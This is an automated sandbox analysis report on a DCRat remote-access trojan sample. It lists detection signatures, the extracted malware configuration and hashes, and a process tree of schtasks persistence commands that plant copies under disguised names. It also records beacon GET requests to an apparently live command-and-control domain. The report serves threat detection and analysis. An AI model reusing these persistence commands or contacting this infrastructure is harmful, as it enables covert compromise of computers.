Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oFAjWuoHBq.exe

Overview

General Information

Sample name:oFAjWuoHBq.exe
renamed because original name is a hash value
Original sample name:97177514cab51539083ef130f005bbd1.exe
Analysis ID:1581832
MD5:97177514cab51539083ef130f005bbd1
SHA1:49e2661ee3e8f6fd6b06334b00543590ed8fe208
SHA256:500a74281de1bc8e6eb4e08eb8705235f4436ccb209ecaca91fe4ad43a869015
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • oFAjWuoHBq.exe (PID: 1372 cmdline: "C:\Users\user\Desktop\oFAjWuoHBq.exe" MD5: 97177514CAB51539083EF130F005BBD1)
    • schtasks.exe (PID: 6516 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7152 cmdline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6128 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6388 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5268 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6472 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5764 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5436 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1096 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2272 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5036 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1220 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1120 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6628 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1472 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • ctfmon.exe (PID: 7152 cmdline: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe" MD5: 97177514CAB51539083EF130F005BBD1)
  • ctfmon.exe (PID: 6128 cmdline: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe" MD5: 97177514CAB51539083EF130F005BBD1)
  • Registry.exe (PID: 5612 cmdline: C:\Users\Public\AccountPictures\Registry.exe MD5: 97177514CAB51539083EF130F005BBD1)
  • Registry.exe (PID: 6544 cmdline: C:\Users\Public\AccountPictures\Registry.exe MD5: 97177514CAB51539083EF130F005BBD1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"A\":\"-\",\"G\":\"%\",\"9\":\"<\",\"d\":\"&\",\"C\":\"#\",\"k\":\"$\",\"F\":\")\",\"V\":\"*\",\"L\":\"^\",\"e\":\"(\",\"i\":\"@\",\"o\":\"`\",\"H\":\"_\",\"W\":\".\",\"6\":\">\",\"I\":\" \",\"5\":\"|\",\"N\":\"~\",\"m\":\";\",\"J\":\",\",\"Z\":\"!\"}", "PCRT": "{\"U\":\";\",\"L\":\"%\",\"Q\":\".\",\"c\":\">\",\"Z\":\"_\",\"1\":\"(\",\"F\":\"`\",\"S\":\"!\",\"H\":\"$\",\"N\":\"@\",\"v\":\"|\",\"y\":\" \",\"R\":\",\",\"Y\":\"&\",\"3\":\"-\",\"G\":\"<\",\"B\":\"#\",\"W\":\"~\",\"2\":\")\",\"n\":\"^\",\"C\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-fVK1Lf5pvBKBEfQSvIgb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 21 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\AccountPictures\Registry.exe, CommandLine: C:\Users\Public\AccountPictures\Registry.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\Registry.exe, NewProcessName: C:\Users\Public\AccountPictures\Registry.exe, OriginalFileName: C:\Users\Public\AccountPictures\Registry.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Public\AccountPictures\Registry.exe, ProcessId: 5612, ProcessName: Registry.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f, CommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oFAjWuoHBq.exe", ParentImage: C:\Users\user\Desktop\oFAjWuoHBq.exe, ParentProcessId: 1372, ParentProcessName: oFAjWuoHBq.exe, ProcessCommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f, ProcessId: 2272, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-29T03:37:02.276316+010020341941A Network Trojan was detected192.168.2.5497045.101.152.1580TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: oFAjWuoHBq.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://ilusharx.beget.tech/Avira URL Cloud: Label: malware
            Source: http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCsAvira URL Cloud: Label: malware
            Source: http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38Avira URL Cloud: Label: malware
            Source: http://ilusharx.beget.techAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\Public\AccountPictures\Registry.exeAvira: detection malicious, Label: HEUR/AGEN.1323944
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeAvira: detection malicious, Label: HEUR/AGEN.1323944
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeAvira: detection malicious, Label: HEUR/AGEN.1323944
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeAvira: detection malicious, Label: HEUR/AGEN.1323944
            Source: C:\Users\user\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323944
            Found malware configuration
            Source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"A\":\"-\",\"G\":\"%\",\"9\":\"<\",\"d\":\"&\",\"C\":\"#\",\"k\":\"$\",\"F\":\")\",\"V\":\"*\",\"L\":\"^\",\"e\":\"(\",\"i\":\"@\",\"o\":\"`\",\"H\":\"_\",\"W\":\".\",\"6\":\">\",\"I\":\" \",\"5\":\"|\",\"N\":\"~\",\"m\":\";\",\"J\":\",\",\"Z\":\"!\"}", "PCRT": "{\"U\":\";\",\"L\":\"%\",\"Q\":\".\",\"c\":\">\",\"Z\":\"_\",\"1\":\"(\",\"F\":\"`\",\"S\":\"!\",\"H\":\"$\",\"N\":\"@\",\"v\":\"|\",\"y\":\" \",\"R\":\",\",\"Y\":\"&\",\"3\":\"-\",\"G\":\"<\",\"B\":\"#\",\"W\":\"~\",\"2\":\")\",\"n\":\"^\",\"C\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-fVK1Lf5pvBKBEfQSvIgb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeReversingLabs: Detection: 78%
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeReversingLabs: Detection: 78%
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeReversingLabs: Detection: 78%
            Source: C:\Users\Public\AccountPictures\Registry.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\StartMenuExperienceHost.exeReversingLabs: Detection: 78%
            Multi AV Scanner detection for submitted file
            Source: oFAjWuoHBq.exeReversingLabs: Detection: 78%
            Source: oFAjWuoHBq.exeVirustotal: Detection: 75%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\Public\AccountPictures\Registry.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeJoe Sandbox ML: detected
            Source: C:\Users\user\StartMenuExperienceHost.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: oFAjWuoHBq.exeJoe Sandbox ML: detected
            Source: oFAjWuoHBq.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\26c12092da979cJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\645bc6bab0f65cJump to behavior
            Source: oFAjWuoHBq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 5.101.152.15:80
            Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ilusharx.beget.techConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ilusharx.beget.tech
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ilusharx.beget.techConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ilusharx.beget.tech
            Source: global trafficDNS traffic detected: DNS query: ilusharx.beget.tech
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ilusharx.beget.tech
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003219000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2088975523.00000000137A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ilusharx.beget.tech/
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeCode function: 0_2_00007FF848F0AE600_2_00007FF848F0AE60
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeCode function: 0_2_00007FF848F0A87D0_2_00007FF848F0A87D
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeCode function: 0_2_00007FF848F034AC0_2_00007FF848F034AC
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeCode function: 0_2_00007FF848F0AD250_2_00007FF848F0AD25
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeCode function: 0_2_00007FF848F0ACED0_2_00007FF848F0ACED
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeCode function: 0_2_00007FF848F09D610_2_00007FF848F09D61
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F4AE6017_2_00007FF848F4AE60
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F4A87D17_2_00007FF848F4A87D
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F434AC17_2_00007FF848F434AC
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F4AD2517_2_00007FF848F4AD25
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F4ACED17_2_00007FF848F4ACED
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F49D6117_2_00007FF848F49D61
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F4364518_2_00007FF848F43645
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F55E2118_2_00007FF848F55E21
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F5229018_2_00007FF848F52290
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F56D2818_2_00007FF848F56D28
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F54D6D18_2_00007FF848F54D6D
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F5376818_2_00007FF848F53768
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F5444818_2_00007FF848F54448
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F542E018_2_00007FF848F542E0
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F5070518_2_00007FF848F50705
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F51B5018_2_00007FF848F51B50
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 19_2_00007FF848F2AE3D19_2_00007FF848F2AE3D
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 19_2_00007FF848F2A87D19_2_00007FF848F2A87D
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 19_2_00007FF848F234AC19_2_00007FF848F234AC
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 19_2_00007FF848F2AD2519_2_00007FF848F2AD25
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 19_2_00007FF848F2ACED19_2_00007FF848F2ACED
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 19_2_00007FF848F29D6119_2_00007FF848F29D61
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F0364520_2_00007FF848F03645
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F15E2120_2_00007FF848F15E21
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F1229020_2_00007FF848F12290
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F16D2820_2_00007FF848F16D28
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F1376820_2_00007FF848F13768
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F14D6D20_2_00007FF848F14D6D
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F1444820_2_00007FF848F14448
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F142E020_2_00007FF848F142E0
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F1070520_2_00007FF848F10705
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 20_2_00007FF848F11B5020_2_00007FF848F11B50
            Source: C:\Users\Public\AccountPictures\Registry.exeCode function: 21_2_00007FF848F3364521_2_00007FF848F33645
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 22_2_00007FF848F1AE3D22_2_00007FF848F1AE3D
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 22_2_00007FF848F1A87D22_2_00007FF848F1A87D
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 22_2_00007FF848F134AC22_2_00007FF848F134AC
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 22_2_00007FF848F1AD2522_2_00007FF848F1AD25
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 22_2_00007FF848F1ACED22_2_00007FF848F1ACED
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 22_2_00007FF848F19D6122_2_00007FF848F19D61
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F35E2123_2_00007FF848F35E21
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F3229023_2_00007FF848F32290
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F36D2823_2_00007FF848F36D28
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F3376823_2_00007FF848F33768
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F34D6D23_2_00007FF848F34D6D
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F3444823_2_00007FF848F34448
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F342E023_2_00007FF848F342E0
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F3070523_2_00007FF848F30705
